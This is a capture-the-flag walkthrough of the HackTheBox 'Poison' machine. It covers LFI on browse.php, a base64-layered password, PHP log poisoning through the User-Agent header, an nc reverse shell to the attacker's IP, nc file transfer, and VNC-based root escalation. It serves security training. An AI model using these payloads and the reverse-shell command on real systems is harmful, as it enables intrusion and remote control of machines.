Poison HackTheBox WalkThrough


This is the Poison HackTheBox machine walkthrough, the 20th machine in our OSCP-like HTB boxes series. In this writeup I show step by step how I rooted the Poison HTB machine in two different ways. Before starting, a few facts about the machine: it is a FreeBSD box with IP address 10.10.10.84, rated medium difficulty by its maker.

This machine is retired, so you need a VIP subscription at hackthebox.eu to access it. First, connect your PC to the HackTheBox VPN and confirm connectivity to the Poison machine by pinging 10.10.10.84. If that works, start hacking. As usual I began by scanning the machine with Nmap (a port scanner); the result is below.

Scanning

$ sudo nmap -sC -sV -oA nmap/Poison 10.10.10.84

$ cat nmap/Poison.nmap

Performing Nmap scan during Poison HackTheBox Walkthrough

Nmap found ports 22 and 80 open: OpenSSH on port 22 and an Apache 2 web server on port 80. Port 22 offers little to enumerate without credentials, since this OpenSSH 7.2 build gives us nothing that helps further enumeration, so I started with port 80, which has a far larger attack surface. Going to http://10.10.10.84/ I found a website made entirely of HTML and PHP.

Poison web page

The page offers several PHP scripts to test. After entering listfiles.php into the Scriptname field and submitting, I got back an array listing many files. One of them is pwdbackup.txt.

content of listfiles.php

When I accessed that file at view-source:http://10.10.10.84/browse.php?file=pwdbackup.txt, it contained a block of base64-encoded text along with a message that it is encoded at least 13 times.

Content of pwdbackup.txt files shown during Poison HackTheBox Walkthrough

Decoding it gave a password. Copy the whole encoded blob into a file and decode it 13 times:

$ nano encoded-passwd

$ base64 -d encoded-passwd | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d

Decoding base64 text 13 times to get password of user charix
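Chaining thirteen base64 -d invocations by hand only works because the note told us the layer count. The added example below (my code, not from the original walkthrough) peels nested base64 generically: it strips line wrapping, stops when the content is no longer strict base64, and also stops when the next layer would decode to non-text, which guards against a plaintext that happens to look like base64. The sample input is constructed by wrapping the recovered password 13 times; that pwdbackup.txt was produced with 76-column line wrapping is an assumption.

```python
import base64
import binascii
import re

# Strict base64 alphabet check applied after whitespace is removed (the
# original file is line-wrapped, so newlines must be tolerated but nothing else).
B64_RE = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")


def looks_like_text(data: bytes) -> bool:
    """True if data decodes as UTF-8 made of printable characters or whitespace."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch.isspace() for ch in text)


def peel_base64(blob: bytes, max_layers: int = 64):
    """Decode nested base64 until the content stops being valid base64, or the
    next layer would decode to binary garbage. Returns (plaintext, layers)."""
    current = blob
    layers = 0
    while layers < max_layers:
        compact = b"".join(current.split())  # drop line wrapping / trailing newline
        if not compact or len(compact) % 4 or not B64_RE.match(compact):
            break
        try:
            decoded = base64.b64decode(compact, validate=True)
        except binascii.Error:
            break
        if not looks_like_text(decoded):
            break  # the plaintext merely looked like base64; stop one layer early
        current = decoded
        layers += 1
    return current, layers


def wrap_layers(secret: bytes, n: int) -> bytes:
    """Constructed test input: base64-encode `secret` n times with 76-column line
    wrapping, mimicking how pwdbackup.txt was presumably produced (an assumption)."""
    for _ in range(n):
        secret = base64.encodebytes(secret)
    return secret


# Constructed sample: the password recovered in the walkthrough, wrapped 13 times.
SAMPLE = wrap_layers(b"Charix!2#4%6&8(0", 13)

if __name__ == "__main__":
    plaintext, n = peel_base64(SAMPLE)
    print(f"{n} layers -> {plaintext.decode()}")
```

The text-check matters for short passwords: a plaintext such as pass is itself valid base64, so a naive loop would decode one layer too far and return garbage.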

After decoding I got the password Charix!2#4%6&8(0, but did not yet know whose password it is; we would try it over SSH once we had a username. Further enumeration showed that browse.php has a Local File Inclusion (LFI) vulnerability: http://10.10.10.84/browse.php?file=/etc/passwd returns the passwd file (view the page source for a cleaner view, as in the screenshot). /etc/passwd revealed two users with a login shell, root and charix. SSH as charix with the decoded password worked immediately, so our credentials are charix : Charix!2#4%6&8(0.

Confirming LFI in Poison during its walkthrough

Let us SSH into charix’s account.

Getting User Shell via SSH ~ Method 1

$ ssh charix@10.10.10.84

~Charix!2#4%6&8(0

% whoami && id

Getting user shell through SSH during Poison HackTheBox Walkthrough

We have a user shell. Let us capture the user flag.

Capture User Flag

% cat user.txt

Capturing user flag in Poison Walkthrough

Getting User Shell via Log Poisoning ~ Method 2

We have the user flag. I am also going to get a shell the other way, which is probably the intended one: log poisoning, presumably the reason the box is called Poison. First, what is log poisoning? When an attacker finds an LFI vulnerability he tries to upgrade it to RCE, and log poisoning is one technique for that: inject PHP code into something the web server writes into its log file, then include that log file through the LFI so the PHP interpreter executes the injected code.

The access log records the User-Agent header, which the attacker fully controls and which Apache writes verbatim, so he replaces the User-Agent with his own PHP code as shown in the request below (captured against http://10.10.10.84). Send it from Burp Repeater or curl rather than a browser, whose User-Agent is fixed, and make sure the PHP is syntactically valid: a parse error in any line of the log breaks every later include of that file. After sending the request, including the log file shows the output of that code. For more on LFI to RCE check this link.

Injecting php code in User-Agent header during Poison HackTheBox Walkthrough

We can read the log file of the Poison web server at view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log. As you can see, our PHP code was executed and hello is printed in the log.

Access log file of Poison Webserver

Now let us make the PHP code read a cmd parameter, so we can execute OS commands and get a reverse shell. Replace the User-Agent with the following PHP code and forward the request from Repeater:

<?php system($_GET['cmd']) ?>

Injecting php code 2 in User-Agent header during Poison HackTheBox Walkthrough

Confirming RCE

We can now open view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id in the browser to execute OS commands. Replace id with the required command and its output appears where the poisoned log entry sits, near the bottom of the page. The result of id at the bottom confirms RCE.

Access log file of Poison Webserver and confirming RCE on Poison Hackthebox machine

We have confirmed RCE via log poisoning. To get a reverse shell, start a netcat listener on your Kali machine in one window and request the following URL, either in a browser or with curl as shown below.

Getting Reverse Shell

$ nc -nvlp 1234

$ whoami && id

$ curl 'http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.16%201234%20%3E/tmp/f'  # quote the URL, or the shell interprets &, ; and | itself

Getting user shell on Poison during its walkthrough

We have a user shell again, and this was the intended way into the box. Now exit this shell and log in over SSH with charix : Charix!2#4%6&8(0 for the privilege escalation, since a proper SSH session is more comfortable than a reverse shell.

Privilege Escalation

To escalate to root we first need a privilege escalation vector.

Finding PrivEsc Vector

During initial enumeration I found a file secret.zip in charix's home directory and copied it to my Kali machine to unzip and analyse it. Extraction asked for a password; Charix!2#4%6&8(0 worked. It produced a file named secret, which file reports as extended-ASCII data, and cat shows only unreadable characters. I did not yet know what it was for, so I set it aside until it became clear where it is needed.

Copying File locally to Kali Machine

$ nc -l -p 1234 > secret.zip < /dev/null # On Kali machine: start the listener first

% cat secret.zip | nc 10.10.14.16 1234 # On Poison machine: then push the file

$ unzip secret.zip

~Charix!2#4%6&8(0

Copying secret.zip file locally to Kali Box

Checking for listening ports on the Poison machine, I found ports 5801 and 5901 listening on localhost only. Some googling showed these are VNC ports (5900+display for the RFB protocol, 5800+display for the HTTP/Java viewer), used for remote desktop access.

% netstat -an | grep "LISTEN"

Checking listening port on Poison Hackthebox machine during its walkthrough

ps then confirmed an Xvnc process, a VNC server, and it is running as root. So VNC is our potential PrivEsc vector.

% ps -aux | grep vnc

Checking Xvnc process

Since VNC serves a graphical desktop, we cannot use it from our terminal session on the box, and the port is bound to localhost so we cannot reach it from Kali directly. Instead we forward port 5901 from the box to our Kali machine over SSH and connect a VNC viewer to the forwarded port.

Local Port Forwarding

$ ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84 # Local port forwarding: Kali's 5901 -> Poison's 127.0.0.1:5901

~Charix!2#4%6&8(0

$ ss -lnpt # Check listening port on your Kali machine

Performing Local port forwarding on Poison htb
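Finding loopback-only listeners and turning them into ssh -L arguments is the routine behind the two steps above. The following is an added example of mine, not code from the walkthrough: it parses FreeBSD's netstat -an layout, where the address and port are joined by a dot, keeps TCP sockets in LISTEN state, and reports the ports that are bound only to 127.0.0.1 (a port that is also bound to a wildcard address is reachable directly and needs no tunnel). The netstat output is a constructed sample in that layout, not the real output from the box; IPv6 literals are skipped rather than guessed at.

```python
import re

# Constructed sample in FreeBSD `netstat -an` layout; not the box's real output.
SAMPLE_NETSTAT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.16.51234      ESTABLISHED
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
udp4       0      0 *.514                  *.*
"""

# FreeBSD joins IPv4 address and port with a dot: 127.0.0.1.5901 or *.80
LOCAL_RE = re.compile(r"^(?P<addr>\*|[\d.]+)\.(?P<port>\d+)$")


def parse_listeners(text: str):
    """Return (proto, addr, port) for every TCP socket in LISTEN state."""
    out = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp") or fields[-1] != "LISTEN":
            continue
        m = LOCAL_RE.match(fields[3])
        if not m:  # IPv6 literal or unexpected layout: skip rather than guess
            continue
        out.append((fields[0], m.group("addr"), int(m.group("port"))))
    return out


def loopback_only_ports(text: str):
    """Ports listening only on 127.0.0.1, i.e. reachable solely through a tunnel."""
    listeners = parse_listeners(text)
    wildcard = {port for _, addr, port in listeners if addr == "*"}
    return sorted({port for _, addr, port in listeners
                   if addr.startswith("127.") and port not in wildcard})


def ssh_forward_command(user: str, host: str, ports) -> str:
    """ssh -L invocation mapping each loopback-only port to the same local port."""
    flags = " ".join(f"-L {p}:127.0.0.1:{p}" for p in ports)
    return f"ssh {flags} {user}@{host}"


if __name__ == "__main__":
    ports = loopback_only_ports(SAMPLE_NETSTAT)
    print(ports)
    print(ssh_forward_command("charix", "10.10.10.84", ports))
```

Paste the real netstat -an output from the box into SAMPLE_NETSTAT to get the forwarding command for that host; on Linux targets the local-address column uses a colon instead of the trailing dot and the regex would need adjusting.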

When I connected with vncviewer to the forwarded port 5901 using the secret file as the password file, a VNC desktop opened, as in the screenshot, and it runs as root. This also explains the unreadable file: vncviewer's -passwd option expects a VNC passwd file, the password obfuscated with DES under a fixed key, which is binary rather than text. So we have escalated to root. Let us capture the root flag.

$ vncviewer -passwd secret 127.0.0.1:5901

Connecting to VNCviewer through password file secret in Poison Hackthebox Walkthrough

Capture root Flag

# whoami

# hostname

# id

# ls

# cat root.txt

Capturing root flag in Posion Htb

This was how I rooted the Poison HackTheBox machine. I hope you learnt something new from this walkthrough. Thanks for reading. For any query or suggestion related to the walkthrough, feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/